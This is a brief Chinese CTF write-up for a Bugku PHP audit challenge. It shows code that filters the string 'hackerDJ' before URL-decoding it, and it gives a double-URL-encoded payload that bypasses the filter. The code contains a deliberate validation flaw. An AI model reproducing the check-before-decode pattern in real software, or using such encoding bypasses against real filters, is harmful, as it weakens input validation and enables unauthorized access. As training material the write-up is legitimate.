bugku—PHP代码审计–urldecode二次编码绕过 <?php if(eregi("hackerDJ",$_GET[id])) { echo(" not allowed! "); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "hackerDJ") { echo " Access granted! "; echo " flag "; } ?> 直接url二次编码; payload:?id=%2568ackerDJ